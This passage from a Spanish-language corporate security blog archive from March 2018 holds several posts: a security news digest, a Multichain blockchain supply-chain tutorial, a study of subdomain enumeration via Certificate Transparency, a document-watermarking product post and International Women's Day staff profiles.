recibiendo pagos después de que saliera la mayor parte del saldo de las cuentas. Además, al fork de Bitcoin Cash hay que añadir otra variable, el fork de Bitcoin Gold que tuvo lugar en el último trimestre del año. Este nuevo fork decía estar destinado a democratizar el proceso de minado y tomó como referencia la cadena de bloques de Bitcoin. De hecho, las cuentas de Bitcoin han seguido recibiendo operaciones después de las retiradas de agosto. Por este motivo, todavía quedan pendientes 1,89111948 en bitcoins (0,23814854, 1,38351522 y 0,26945572), algo más de 15200 dólares a los que hay que sumar los 84 dólares correspondientes a los 1,53575699 Bitcoin Gold que también hay en sus cuentas. Parece razonable pensar que la pregunta no es si habrá más movimientos, sino cuándo tendrán lugar. Félix Brezo Equipo de Innovación y Laboratorio de ElevenPaths @febrezo felix.brezo@11paths.com Yaiza Rubio Equipo de Innovación y Laboratorio de ElevenPaths @yrubiosec yaiza.rubio@11paths.com
27 de marzo de 2018
#CyberSecurityPulse: Olimpiada de PyeongChang: ¿Un nuevo ataque de falsa bandera?
Un nuevo análisis de las muestras de malware identificadas en las pasadas olimpiadas de PyeongChang revela un intento deliberado de los atacantes de poner pistas falsas en cuanto a atribución se refiere, según investigadores. Días después del ataque a las redes de los Juegos Olímpicos de invierno, expertos de seguridad lo atribuyeron a rusos, iraníes, chinos y a grupos como Lazarus, un grupo relacionado con Corea del Norte. Sin embargo, expertos en seguridad ahora creen que un nuevo threat actor estaría sembrando cierta confusión entre aquellos que intentan asignar la atribución al ataque. "Quizás ningún otro malware ha tenido tantas hipótesis en cuanto a la atribución como el de las Olimpiadas", dijo Vitaly Kamluk, investigador y coautor de un informe publicado sobre los ataques. "Dada la reciente politización del ciberespacio, una atribución errónea podría tener graves consecuencias y los actores podrían empezar a tratar de manipular la opinión de la comunidad para influir en la agenda geopolítica". En los días posteriores al ataque surgió un flujo constante de teorías que más tarde fueron desacreditadas y consideradas inconclusas. "La respuesta de la industria fue un desastre", dijo Kamluk. "Había demasiados dedos señalando sin certeza". Más allá de la falsa bandera de Lazurus, los investigadores dijeron que el grupo de habla rusa Sofacy (también conocido como Fancy Bear y APT28) también estuvo implicado en el ataque. Otros trozos de código malicioso vincularon a los grupos afiliados a China como APT3 (Gothic Panda), APT10 (MenuPass Group) y APT12 (IXESHE). En realidad, este es solo un ejemplo más. Según Kamluk, el tiempo es una herramienta poderosa para determinar la atribución de un incidente. Verdad. Sin embargo, en la mayoría de las ocasiones no podremos esperar un tiempo indefinido para tomar decisiones. Más información en ThreatPost Noticias destacadas Empresas de criptomonedas en el foco de la Comisión de Valores y Bolsa La Comisión de Valores y Bolsa envió citaciones en las últimas semanas a docenas de compañías de tecnología e individuos que están involucrados con criptodivisas, según The Wall Street Journal. Los objetivos de las citaciones incluyen empresas que han lanzado ofertas iniciales de monedas (ICOs), así como sus abogados y asesores. Se dice que las citaciones incluyen solicitudes de información sobre cómo se estructuran las ventas y preventas de ICO, dijeron las fuentes anónimas a WSJ. Asimismo, la SEC también está solicitando las identidades de los inversionistas que compraron tokens digitales. Más información en The Wall Street Journal Herramientas de la NSA que identifican PCs previamente infectados para retirarse de ellos Las herramientas filtradas el pasado año y que se creen que pertenecían a la Agencia de Seguridad Nacional de Estados Unidos (NSA) contenían una utilidad para detectar la presencia de malware desarrollado por otros grupos de ciberespionaje. Esta utilidad, denominada "Territorial Dispute" (conflicto territorial), tiene por objeto alertar a los operadores de la NSA sobre la presencia de otros grupos de espionaje en un equipo comprometido y retirarse de una máquina infectada para evitar una mayor exposición de las herramientas y operaciones de la NSA por otros actores estatales. Más información en Bleeping Computer Noticias del resto de la semana Facebook actualiza automáticamente los enlaces a HTTPS para aumentar la seguridad Facebook anunció el pasado 5 de marzo que está activando una nueva función que dirigirá automáticamente a los usuarios a HTTPS sobre un determinado enlace, si éste se encontrara disponible. La característica conocida como HTTP Strict Transport Security (HSTS) preloading está siendo implementada en facebook.com e Instagram. Con la precarga de HSTS, un link que un usuario haya publicado como un enlace HTTP se redirigirá automáticamente a un enlace HTTPS para una determinada web. Más información Microsoft lucha contra el brote masivo de malware de Cryptocoin Microsoft ha bloqueado un brote de malware que se está extendiendo rápidamente y que podría haber infectado a casi 500.000 equipos Windows en cuestión de horas el pasado 6 de marzo. El troyano, conocido como Dofoil o Smoke Loader, fue diseñado para distribuir payloads. Sin embargo, en este caso, ponían a minar criptodivisas en los PCs infectados, con el fin de ganar aquellos que están detrás del troyano monedas Electroneum a partir las CPU de las víctimas. Más información en ZDnet El grupo TEMP.Periscope pone foco en las industrias de ingeniería y marítimas de Estados Unidos La mayoría de los ataques realizados por el grupo grupo TEMP.Periscope se han focalizado contra institutos de investigación, organizaciones académicas y empresas privadas en los Estados Unidos. Los investigadores de FireEye han confirmado que las tácticas, técnicas y procedimientos (TTP) y los objetivos de grupo TEMP.Periscope se superponen con los grupos TEMP.Jumper y NanHaiShu APT. Más información en Fireeye Otras noticias Plugins de los editores de texto más populares podrían ayudar a elevar privilegios Más información en The Hacker News Tratan de causar una explosión en una planta petroquímica saudí Más información en Security Affairs Expertos descubren una vulnerabilidad de tipo buffer overflow en MikroTik RouterOS Más información en Security Affairs ¡Regístrate a la newsletter!
20 de marzo de 2018
ElevenPaths participa en la UMA Hackers Week V
Durante la semana del 19 de marzo, tendrá lugar en Málaga una nueva edición de la UMA Hackers Week, un evento gratuito y abierto al público para desarrolladores y apasionados de la seguridad informática, que se celebra como cada año en la Universidad de Málaga. En los días del 19 al 22 de marzo, se desarrollarán numerosas ponencias y talleres sobre nuevas tecnologías, programación y sobre todo seguridad informática. Las charlas, talleres, conferencias y coloquios reúnen tanto a profesionales del sector como a miembros de la comunidad. En sus cuatro ediciones han contado ya con ponentes de alto nivel de compañías como Google, Microsoft o Telefónica, entre otros. Este año, la quinta edición de la conferencia contará además, con la presencia de dos de nuestros expertos del equipo de innovación y laboratorio de ElevenPaths, José Torres y Marcos Arjona, que impartirán la ponencia titulada “Málaga, costa de la innovación”. En esta conferencia, que se desarrollará el día 20, de 18:30h a 19:15h, se mostrarán algunos de los últimos proyectos y tecnologías en las que trabaja nuestro área de innovación y laboratorio. Además, se hará una reflexión sobre la presencia de Málaga como un actor principal en el sector de la ciberseguridad, donde grandes multinacionales como Telefónica o Google han establecido sus unidades.
16 de marzo de 2018
Haciendo más fácil lo que parece difícil: la trazabilidad con blockchain de la cadena de suministro
Discusiones sobre la tecnología de la cadena de bloques tienen una presencia cada vez mayor en nuestro entorno. Los nuevos casos de uso van acaparando cada vez más páginas de medios generalistas y muchos tienen la sensación de que quien no haya comenzado a definirlos parece que llega tarde. Sin embargo, muy poco tiempo después de que las organizaciones se lancen a invertir parte de sus recursos en ver cómo Blockchain puede ayudarles en determinados procesos de su negocio, comienzan las preguntas. Una de las típicas cuestiones que se formulan quienes empiezan a considerar la posibilidad de implantar la tecnología es la de tomar la decisión sobre optar por cadenas de bloques públicas o privadas. En el caso de que optemos por apoyarnos en una cadena de bloques pública, ¿tendremos capacidad para estimar correctamente el volumen de transacciones que realizaremos mientras dure el proyecto? ¿Qué implicaciones puede tener el incremento de las comisiones y la volatilidad de la divisa? Si, por contra, optamos por una cadena de bloques privada en la que tengamos más control sobre quién opera con ella, ¿qué tecnología podremos desplegar si tampoco tenemos muy claro para qué la vamos a necesitar? ¿Qué costes tienen las distintas alternativas y qué conllevan? Ante tantas preguntas, lo mejor es tocar la tecnología. En el Lab de ElevenPaths tenemos como lema que si algo lo oyes, lo olvidas. Si lo ves, lo recuerdas. Pero, en cambio, si lo haces, lo terminas aprendiendo. Con este fin, una de las herramientas que más nos ha ayudado a explicar las posibilidades que ofrece una cadena de bloques permisionada es el proyecto de Multichain. Un caso de uso: el seguimiento de la cadena de suministro Imaginemos un caso de cadena de suministro que implica a dos o más organizaciones. En este caso, no podemos confiar en que el registro de todas las operaciones se realice de manera individual dado que la mera existencia de información falsificada o borrada podría tener consecuencias negativas para el resto de actores de la cadena. Sin embargo, sigue siendo fundamental que todos se pongan de acuerdo en ver qué operaciones han tenido lugar para evitar controversias. Para resolver este problema, necesitamos una base de datos compartida en la que se escriban todos los registros. Cada registro acompañado de un sello de tiempo y una prueba de su procedencia. La solución estándar pasa por crear un intermediario de confianza, cuya función consiste en recopilar y almacenar los registros de forma centralizada. Pero las cadenas de bloques ofrecen un enfoque diferente, dando a las organizaciones una forma de gestionar conjuntamente este archivo, a la vez que impiden que los participantes individuales (o pequeños grupos de ellos) lo corrompan. En este sentido, nuestra cadena de bloques tendrá el objetivo de realizar la trazabilidad, por ejemplo, de las camisetas creadas por un fabricante hasta que llegan al pequeño comercio para su venta. En este caso tendremos, por tanto, distintos actores: El fabricante de las camisetas, que, además de producir las camisetas físicamente, emitirá un nuevo token digital que representará en nuestra cadena a las camisetas. Los distintos actores que formen parte de la cadena de distribución de las camisetas, que irán dejando constancia en la blockchain cada vez que traspasen los activos al siguiente actor en la cadena de suministro. Dado este supuesto, ¿cómo podríamos utilizar Multichain para implementar una sencilla prueba de concepto? Configuración y permisionado básico En primer lugar, crearemos nuestra cadena de bloques que se llamará 11pathschain: ElevenPaths@server1$ multichain-util create 11pathschain Esto nos generará un fichero params.dat donde indicaremos qué parámetros por defecto queremos para nuestra nueva cadena. Entre ellos podremos configurar distintos aspectos relativos al permisionado de la cadena, es decir, qué permisos estarán activados por defecto, o aspectos relacionados con el protocolo en sí mismo como el tiempo medio que transcurre entre bloques y el tamaño máximo de los mismos. ElevenPaths@server1$ gedit ~/.multichain/11pathschain/params.dat Figura 1. Parámetros de configuración de 11pathschain. Sin embargo, solo hemos configurado las reglas del juego. Ahora tenemos que arrancar el primer nodo de la red inicializando el daemon: ElevenPaths@server1$ multichaind 11pathschain –daemon Para facilitar que un tercero se pueda conectar a nuestra cadena de bloques, deberá instalarse el software de multichain y conectarse a nuestro nodo siguiendo los pasos que ya nos muestra el cliente al arrancar el nodo original. ElevenPaths@server2$ multichaind 11pathschain@XX.XX.XX.XX:2681 Sin embargo, no perdamos de vista que estamos trabajando con una cadena de bloques permisionada. Si hemos seguido las instrucciones como hasta hora las nuevas máquinas que se vayan a conectar a nosotros todavía no tienen ningún permiso, ni tan siquiera para conectarse. De hecho, al arrancar el comando anterior en un segundo servidor, el nodo se descargará las reglas del juego de esta nueva blockchain, pero todavía no podrá conectarse. Figura 2. Inicialización del daemon. Para conseguirlo, tendrá que solicitar al administrador de nuestra blockchain permisionada el permiso de conexión. En Multichain esto se hace empleando el comando grant para asignar uno o varios permisos. Por tanto, una vez que el administrador del server1 haya recibido la petición, tendrá que ejecutar un comando como el que sigue: ElevenPaths@server1$ multichain-cli 11pathschain grant [direccion_blockchain_server2] connect,send,receive Figura 3. Concediendo permisos a una dirección Tras asignar ese permiso, el nuevo servidor ya podrá conectarse para sincronizarse con el resto de la cadena de bloques y, además, podrá recibir y enviar assets en ella. A partir de ahora, desde cualquiera de los nodos conectados a la red, podremos interactuar con la cadena desde la interfaz de línea de comandos y pedirle información, sobre, por ejemplo, qué direcciones tienen permiso de conexión. Esto lo podemos hacer utilizando el comando listpermissions connect. Figura 4. Listado de permisos de conexión a la cadena 11pathschain. La emisión de nuevos assets Para generar la representación en la cadena de bloques de nuestras camisetas recién fabricadas, tendremos que emitir (issue) estos nuevos activos. Hay que tener en cuenta que no todo el mundo debe tener permisos de emisión (en nuestro caso, solamente será el fabricante) y además que esas camisetas recién generadas tendrá que tener permisos de recepción (receive). Esto nos obligará a definir claramente cuáles son los roles que adquirirá cada participante. Figura 5. Proceso de creación de camisetas en nuestra cadena de bloques. Una vez que las hemos emitido, podremos consultar el saldo de la dirección. En este caso usaremos el comando getmultibalances, que nos muestra el balance de las direcciones del nodo en el que lo estemos ejecutando y que en este caso solamente incluyen las 1000 camisetas recién emitidas, pero que podrían incluir también otros tipos de assets. Figura 6. Balance de camisetas por dirección. Una vez las hemos emitido, ¿cómo podría funcionar el sistema cuando llegue el primer distribuidor a recoger el primer lote de 200 camisetas? El fabricante tendrá que emitir una operación de envío (sendasset) en la que especificará la dirección del distribuidor/destinatario, el tipo de asset y la cantidad a enviar. Figura 7. Envío de assets a otro operador de la cadena. En este punto, solo nos quedaría verificar en el nodo del distribuidor la cantidad de camisetas recibidas por parte del fabricante. Este proceso de envío de assets se replicará tantas veces como actores tenga nuestra cadena de suministro con la garantía de que cada operación va a quedar sellada con su correspondiente marca de tiempo en la cadena de bloques que creemos y que estará replicada en todos los nodos que formen parte de la red que la sostiene. Aunque para un caso real la definición de actores y flujos es fundamental, las opciones de configuración de Multichain son ya de por sí bastante amplias (incluyendo otras opciones que son necesarias como issuemore o sendassetfrom) y nos permiten escenificar el funcionamiento de una blockchain permisionada y visibilizar las posibilidades de la tecnología. Esperamos que este ejemplo os haya ayudado a entenderlas pero la pregunta importante sigue ahí presente y la debes responder por tu cuenta: ¿de verdad sabes si Blockchain puede ayudarte en algo? Félix Brezo Equipo de Innovación y Laboratorio de ElevenPaths @febrezo felix.brezo@11paths.com Yaiza Rubio Equipo de Innovación y Laboratorio de ElevenPaths @yrubiosec yaiza.rubio@11paths.com
13 de marzo de 2018
Nuevo Informe: Certificate Transparency Mining, hasta un 10% de mejora en la enumeración de subdominios "de calidad"
Pese a estar concebido como un mecanismo para el refuerzo de la seguridad durante la navegación web, Certificate Transparency proporciona unas capacidades laterales muy interesantes y diferentes respecto a su propósito original. Ese registro de certificados, que contiene un histórico del uso, periodos de validez y fechas de expiración, ofrece en realidad un conjunto de datos apto para diversos procesos de minería de datos. Durante nuestro seguimiento de Certificate Transparency que hemos venido siguiendo en los últimos tiempos con especial interés, y realizando una serie de investigaciones al respecto, hemos podido comprobar cuánto juego puede llegar a dar. El primer uso, casi obvio, es poder utilizarlo como un sistema para reconocer los subdominios de las empresas, incluso los internos, algo que no ha estado exento de debate. A modo de ejercicio, hemos realizado este extenso informe que pretende evaluar si el uso de Certificate Transparency supone alguna mejora respecto a los mecanismos "clásicos" de enumeración de subdominios, que es una de las pruebas habituales de pentesting usada para valorar la seguridad y vulnerabilidad de un objetivo online. La respuesta es que sí, y que ya hemos integrado este nuevo paradigma en nuestros sistemas para dos fines: Mejorar FaasT, la herramienta de pentesting persistente. Utilización de este sistema para minería de datos general, relacionado con la vigilancia de qué información es filtrada al exterior. Siendo la enumeración de mecanismos "clásicos" una de las pruebas habituales de pentesting usada para valorar la seguridad y vulnerabilidad de un objetivo online, decidimos realizar un experimento para comprobar no solo cómo lo mejoraba (que estaba claro) sino en cuánto. El experimento Cualquier proceso de análisis de seguridad de algún sistema requiere una fase inicial de captura y recogida de información sensible y útil, a partir de la que se pueden realizar el resto de pruebas de resistencia, riesgos de seguridad y detección de vulnerabilidades. En este proceso inicial resulta clave la enumeración lo más exhaustiva posible de los dominios y subdominios utilizados por la organización. Éstos apuntan directamente a servidores, servicios y hosts expuestos que ofrecen información relevante sobre la infraestructura del sistema objetivo. En nuestro experimento, hemos seleccionado como objetivos tres sectores bien diferenciados para comprobar cómo de expuesto se encuentra cada uno de ellos, y cómo el Certificate Transparency Mining puede ayudar a visualizar nueva infraestructura "oculta" pero pública. En este caso, nos hemos decantado por experimentar sobre dominios de tres sectores diferentes: Educativo Bancario Gubernamental (Administración pública) De cada uno de ellos hemos elegido cinco dominios muy representativos y realizados las pruebas clásicas de enumeración. Después, los hemos enriquecidos con Certificate Transparency Mining y hemos comparado resultados. Existen muchas herramientas "clásicas", suites y técnicas para la obtención de subdominios (incluso algunas que ya introducen algo de Certificate Transparency). Cada una de ellas tiene un menor o mayor encaje según requisitos de velocidad, mecanismo a usar, tipo de objetivo, etc. Entre todas ellas, nos hemos quedado con el siguiente subconjunto de utilidades que abarca bien las opciones disponibles de un analista de seguridad: Herramientas online: Pentest-tools, DNSdumpster,Shoda y VirusTotal. Herramientas offline: The Harvester, (ejecutada con resolución DNS y con búsqueda inversa), DNSRecon, fuerza bruta con dos diccionarios de tamaños distintos (10k y 101k) y Sublist3r. Para establecer el contraste, las pruebas internas referentes a Certificate Transparency se han realizado utilizando nuestra tecnología Kalkan y su capa enriquecida de servicios. Una herramienta interna en plena fase de desarrollo en nuestro laboratorio. La pauta de nuestro estudio responde a unos principios muy básicos: Evaluación individual de cada una de las pruebas utilizadas obteniendo métricas sobre tiempos de respuesta y cantidad de subdominios encontrados. Minería de subdominios junto a un análisis pormenorizado de los resultados obtenidos para valorar la precisión y calidad de los datos obtenidos. Comparativa de cada prueba respecto a los datos obtenidos usando exclusivamente CT. Comparativa agrupada de las técnicas "clásicas" respecto a CT, obteniendo unas conclusiones de carácter global. Conclusiones Nuestro estudio expone las diferencias entre las técnicas tradicionales de búsqueda de subdominios frente a los resultados que obtenemos solo con CT, mostrando ventajas y desventajas, y siempre atendiendo a una serie de variables parametrizables. Al haber comparado uno a uno los subdominios, hallando coincidencias y descartando datos erróneos (subdominios inactivos o extintos), hemos realizado un proceso exhaustivo de minería para recabar la información que creemos precisa y minuciosa. El resumen cualitativo queda recogido en la siguiente tabla, que demuestra que no existe una prueba definitiva ni un mecanismo absoluto más certero, sino que solo con una combinación de varios se pueden conseguir una enumeración de dominios de gran calidad. De la tabla anterior, podemos inferir bastante información. Por ejemplo, si bien TheHarvester (N) fue la que arrojó el mayor número de resultados, a nivel cualitativo esta técnica adolece de una serie de problemas que lastran su puntuación global: su lentitud, escaso saneamiento, su alta mutabilidad y sobre todo su baja accesibilidad.. Aunque, además de, como efecto colateral, demostrar las ventajas de unas pruebas sobre otras, nuestro objetivo es reforzar que Certificate Transparency es un mecanismo, que, sin estar específicamente destinado a ello, aporta un valor diferencial y supone una mejora clara sobre las técnicas tradicionales. Aportando, no solo un conjunto de subdominios que no se localizaría utilizando las herramientas clásicas, sino que además, esa cantidad de elementos encontrados tienen una tasa menor de dominios inactivos o erróneos para posteriores fases de pentesting. La siguiente figura resume de manera muy global tal afirmación y demuestra que CT va a ser una fuente de información de enorme interés para este tipo de pruebas. Cuyo pronóstico de crecimiento y aceptación incrementará su usabilidad y eficacia desde el momento en que su uso se generalice y sea soportado por todos los navegadores de forma oficial. En esta gráfica, se resume principalmente que: Del total de subdominios únicos encontrados en cada una de las categorías, un 81% (25031) corresponde a las herramientas tradicionales y clásicas de enumeración mientras que Certificate Transparency aporta un 13% de información "diferente". Entre ambas técnicas hay un 6% (2014) de subdominios compartidos. Esto quiere decir que Certificate Transparency Mining no sustituye a las herramientas clásicas, sino que las complementa y enriquece. De ese 13% de subdominios encontrados por Certificate Transparency Mining que no hubieran sido encontrados de otra forma, un 10% (3057) se encuentran activos, mientras que solo el 3%(803) restante están inactivos. Lo que indica que Certificate Transparency Mining dispone de información muy actual y veraz. Podéis acceder a nuestro informe completo a continuación, realizado durante la segunda mitad de 2017, pero cuya base científica y resultados han guiado pautas de nuestra investigación y desarrollos hasta principios de 2018. Efectos secundarios: comparativa de herramientas clásicas Como efecto secundario del informe, hemos podido llegar a comparar qué herramientas de enumeración "clásicas" son más o menos eficientes y eficaces teniendo en cuenta diferentes parámetros. Algunas gráficas resultan bastante autoexplicativas, aunque invitamos a la lectura completa del informe para una mejor comprensión.
12 de marzo de 2018
Shadow Online, la herramienta que previene la filtración de documentos
Cuando me contaron por primera vez lo que hacía Shadow me quede sorprendido y mi mente retrocedió en el tiempo a la época colegial, cuando nos enseñaron las propiedades del jugo de limón para escribir mensajes secretos en trozos de papel y hacerlos salir a la luz con el calor de una llama. "El mundo de los espías y los agentes secretos" pensaba yo. Todo aquello era mucho más simple que la realidad, pero ya sentía que de alguna manera había tocado ese mundo por un momento. Shadow Online es el nuevo Servicio web de ocultación de datos en documentos sensibles creado e impulsado por el de Data Loss Prevention’s Lab de ElevenPaths, y viene a proporcionar esta característica de seguridad diferencial sobre los documentos, poder ocultar información en el contenido del propio cuerpo, con el fin de poder recuperarla si fuese necesario. Esta información no podrá ser detectada por el ojo humano, pero si puede ser identificada por una máquina. Este detalle la convierte en una tecnología muy atractiva y no son pocos los casos de uso donde podría encajar, desde el marcado de documentos sensibles o confidenciales, pasando por documentos firmados de manera digital, documentos internos propios de la organización o incluso como sistema de clasificación. El objetivo principal es evitar que se produzcan filtraciones de documentos. Si se diese a conocer, por ejemplo, que tu organización tiene la capacidad para marcar los archivos que utilizan sus usuarios con un contenido invisible, que podría, por ejemplo, identificarte o relacionarte, haría que un usuario malicioso se plantease el compartir o no ciertos documentos. Si un documento, por ejemplo, se filtra y sale publicado en algún medio digital, la marca habrá viajado con él y podría descubrirse su origen. Esto contribuye lógicamente a entender por dónde se pueden producir fugas de información y conlleva poder aplicar las medidas correctivas para que no se repitan. ¿Cómo se aplica? Shadow Online utiliza para el marcado técnicas de esteganografía, ocultando marcas en el propio contenido del documento, escondido entre las palabras, que lo hacen imperceptible a los ojos de un usuario. De esta manera, logra que se pueda repetir el mensaje en varias zonas del documento facilitando la detección de la marca, incluso en casos en el que el documento ha sufrido algún tipo de deterioro o está incompleto. El proceso de marcado se realiza exclusivamente sobre archivos pdf. Es la extensión de documentos más utilizada en los ámbitos de firma, colaboración, o repositorios documentales de las organizaciones. Otra característica que lo hace interesante es la capacidad de viajar sobre un documento físico. Si aplicamos la marca sobre un documento digital y este posteriormente se imprime, la marca permanecerá en el papel y una posterior digitalización del mismo nos permitirá extraer la información que se oculta en el contenido. Los documentos firmados digitalmente pierden la firma al ser impresos en papel, Shadow ayuda a corroborar su identidad. ¿Requiere configuración? Dispone de una configuración por defecto que permite su uso inmediato desde el entorno web, pero la información por ocultar en el documento ha de ser parametrizada por el propio usuario, desde un código binario, pasando por texto, correo electrónico, imágenes o incluso un código QR. Estas últimas capacidades están incluidas en la API que proporciona el servicio, ideal para integrarlo junto a otros procesos de gestión documental que maneja la organización, convirtiéndola en una herramienta muy versátil. Interfaz de marcado de documentos en Shadow Online Shadow está de momento disponible en versión online, proporcionando su accesibilidad desde cualquier dispositivo, desde cualquier lugar, para poder aplicar un identificador invisible sobre un documento que nos ayude a proteger la información. Ofrece un interfaz sencillo que nos muestra un histórico de operaciones de marcado y su correspondiente información asociada. De cara a una auditoria de documentos, el servicio dispone del proceso de extracción de la marca, que puede aplicarse ilimitadamente sobre los archivos formato imagen como jpg y png, así como del propio pdf. Un pdf puede convertirse en imagen jpg o png y la marca viajará con ella. Sin duda, una tecnología capacitada para proporcionar un entorno más seguro y confiable sobre el uso y control de la información y contribuir en la mitigación de fugas de documentos sensibles. ¿Quieres prevenir la fuga de archivos sensibles de tu organización? Si quieres saber más sobre el marcado de documentos, habla con nuestros expertos en Ciberseguridad en nuestra comunidad. Antonio Bordón Villar Global Product Manager antonio.bordonvillar@telefonica.com
9 de marzo de 2018
Día de la Mujer, la diversidad es cosa de tod@s
Hoy es el Día Internacional de la Mujer y, desde ElevenPaths, aportamos nuestro pequeño "granito de arena" con este artículo sobre diversidad. Este día surge a finales del siglo XIX, en los comienzos del mundo industrializado, coincidiendo con un período de expansión, crecimiento de la población e ideologías radicales. No obstante, no fue hasta 1.945 cuando se firmó la Carta de las Naciones Unidas, el primer acuerdo internacional para afirmar el principio de la igualdad entre mujeres y hombres. Desde entonces, la ONU ha ayudado a mejorar la condición de las mujeres en todo el mundo. En este contexto, queremos presentaros a varias mujeres, hackers y expertas de ElevenPaths, para que nos hablen de ellas y las reflexiones personales que hacen en este día de reflexión. Yaiza Rubio, analista de inteligencia de ElevenPaths Desde mayo de 2013 trabajo como analista de seguridad en ElevenPaths, tras haberlo hecho en empresas como S21sec e Isdefe. Además colaboro con el Centro de Análisis y Prospectiva de la Guardia Civil y soy coautora del libro «Bitcoin: La tecnología blockchain y su investigación». Además, soy docente en diversos posgrados sobre análisis de inteligencia, seguridad, análisis forense, evidencia digital y fuentes abiertas y codirijo el Título de Experto en Blockchain y Bitcoin de la Universidad Europea de Madrid. Pero sin duda, el año 2017 fue muy especial para mí. Fui nombrada cibercooperante de honor por INCIBE, un proyecto que promueve la sensibilización de los riesgos de Internet. Cumplí uno de mis sueños: acudir como ponente a Blackhat y Defcon, y también tuve el honor de presentar la keynote del Security Innovation Day con Chema Alonso. Sin duda, esto último fue lo más emotivo de 2017. Compartir escenario con tu mayor referente en seguridad no ocurre todos los días. ¡Gracias Chema! La realidad es que la gran mayoría de los conocimientos que tengo surgen de mi inquietud por aprender sobre algo que me siempre me ha parecido importante aprender. Pero no lo he hecho sola. He tenido la suerte de encontrar en el camino a la gente idónea que me ha ayudado a que la tecnología sea algo que me apasione. ¡Gracias Félix! Una de mis grandes aficiones son los deportes de raqueta. Comencé a jugar al tenis con cuatro años. Lo dejé a los 17. Entrenaba tantas horas al día y competía tantas semanas al año que tuve que decantarme por una de las dos cosas. Se me daba bien estudiar, así que la decisión no fue muy difícil. De aquella época me llevo muchas cosas como son la constancia y la resistencia a la frustración. Ahora, parte de mi tiempo libre lo dedico a jugar al pádel. Me encanta quedar con mis compañeros de ElevenPaths y del resto de Telefónica a entrenar. De hecho, el año pasado una compañera de Telefónica España, Elena Sumastre, y yo ganamos el Campeonato de España por empresas representando a Telefónica. ¡Gracias Elena! La igualdad de derechos entre hombres y mujeres es algo por lo que debemos luchar todos, no solo las mujeres. Hay ciertas corrientes que abordan el problema de la desigualdad en la empresa de forma artificial. Puede ser una opción, aunque me parecería una medida injusta si yo fuera hombre. La gente debe definirse por la valía que muestra en un campo específico, independientemente de su sexo. Además, yo trabajo en un sector con una escasa presencia femenina. Parte del problema es cultural. El hecho de por qué las niñas no quieren dedicarse a profesiones tecnológicas está muy relacionado con su círculo más cercano. Al final no deja de ser la gente que tiene la capacidad de influenciarles. Parte de la solución pasaría por tratar de fomentar esa primera experiencia positiva con la tecnología desde pequeños. Mentiría si ahora dijera que Marie Curie o Margaret Hamilton son mujeres que me han inspirado a lo largo de mi vida. Aprecio mucho el mérito que tienen pero me pillan muy lejos. Mi campo siempre ha sido liderado por hombres y, por lo tanto, mis referentes son hombres. Sin embargo, he leído recientemente sobre Katherine Graham, la primera editora del Post, que, durante la Administración Nixon, publicó ciertos documentos de El Pentágono que recogían información clasificada sobre la Guerra de Vietnam. En mi opinión, es de admirar la actitud con la que se enfrentó a aquella decisión de publicar la información clasificada con lo que aquello conllevaba para la época, y más siendo mujer. Eva Suárez, ingeniera de Software en ElevenPaths Como ingeniera de telecomunicaciones, especializada en Telemática, por la UPM, inicié mi carrera profesional en un grupo de investigación dentro de la Universidad Politécnica de Madrid, para posteriormente incorporarme como becaria en Telefónica I+D, trabajando en proyectos de Ciberseguridad. Desde entonces, siempre han estado presentes en mi actividad laboral dos pilares: la investigación y la Ciberseguridad. Dentro de ElevenPaths, he tenido la suerte de colaborar en el desarrollo de diferentes productos de seguridad, junto a compañeros que han contribuido a que siguiese en un aprendizaje continuo. De esta forma, he podido continuar alimentando mi ansia de entender el funcionamiento de las cosas que nos rodean, inquietud que me acompaña desde pequeña. Además, también he tenido la oportunidad de participar en algunas publicaciones y conferencias de la mano de compañeros y amigos. Desde muy joven tuve claro que quería hacer una carrera técnica. Siempre me ha llamado la atención la tecnología que caía en mis manos, aunque es cierto que la reacción de mucha gente cuando con 13 años decía que quería ser ingeniera de telecomunicaciones fuese pensar que era una idea transitoria, que ya se me pasaría, y más viviendo un pueblecito de Asturias de menos de 20 casas. A pesar de ello, siempre me han gustado los retos y éste lo era. Afortunadamente he tenido la suerte de contar siempre con el apoyo de mi entorno más cercano. Entre mis aficiones se encuentra la práctica de deporte, el pequeño placer de pasar una tarde simplemente haciendo largos en la piscina, pasar una jornada en la sierra practicando senderismo, la práctica de deportes de aventura o simplemente salir a correr por las tardes. Opino que cualquier actividad deportiva que se realice de forma regular requiere constancia y trabajo duro para poder ver los resultados del entrenamiento y progresar en las actividades, algo que para mi es fundamental en casi cualquier ámbito para lograr llegar a buen puerto. En el mundo empresarial es cierto que, de acuerdo con numerosos estudios, a día de hoy no existe 100 % la igualdad entre hombres y mujeres. No obstante, he de decir que he tenido la suerte de formar parte de equipos de trabajo en los que no he notado diferencias en este aspecto. En mi opinión, hay que luchar para que lo valorado sea el trabajo realizado por una persona y la calidad del mismo, independientemente de su sexo o de otras condiciones. Si que es cierto que siempre he estado en un entorno predominantemente masculino, pero creo que es algo que puede ir cambiando poco a poco, al igual que lo está haciendo nuestra cultura en términos de igualdad. Nunca he tenido un referente famoso femenino a seguir. Puede que, en parte, porque de pequeña tampoco me han hablado de ninguno en especial. De todas formas, para mi un referente es una p ersona que se esfuerza en su día a día por conseguir aquello que le motiva, a la vez que es capaz de ayudar al resto de personas que le rodean. Siempre sin olvidar que, al final, todos somos iguales y tenemos los mismos derechos. Todas las personas que formamos parte del equipo de ElevenPaths nos unimos hoy para conmemorar el Día Internacional de La Mujer.
8 de marzo de 2018
Todo lo que necesitas saber sobre ciberseguridad en la comunidad de ElevenPaths
Desde ElevenPaths os invitamos a formar parte de nuestra comunidad, un sitio en el que enterarte de las últimas novedades y temas de actualidad en el mundo de la seguridad informática. Suscríbete y recibe noticias y sugerencias para realizar investigaciones, entérate de cuáles serán los próximos eventos sobre ciberseguridad y de qué sucedió en aquellos a los que no pudiste asistir. En nuestra community podrás acceder a multitud de contenido sobre código, información útil y casos de uso de nuestras herramientas. También, podrás compartir tus dudas o sugerencias a través de los comentarios y otros usuarios y nuestros expertos te contestarán. El objetivo de la comunidad es que todos sus usuarios puedan expandir sus conocimientos y ayudar a que otros también lo hagan. ¿Cómo funciona la comunidad? La página principal consta de un buscador en el que encontrarás conversaciones introduciendo palabras clave. Si tienes dudas sobre algún tema, aquí podrás comprobar si alguien ha tenido esa misma duda anteriormente y si otros usuarios han sido capaces de aclararla. En el caso de no encontrar la información o ayuda que estás buscando, podrás abrir una nueva conversación. También podrás realizar una búsqueda personalizada desde al apartado “Categorías“ ubicado en el menú principal. Abrir una nueva conversación es tan sencillo como introducir un título para ella, añadir detalles sobre el tema de la conversación (también podrás seleccionar la categoría a la que pertenece: ideas, 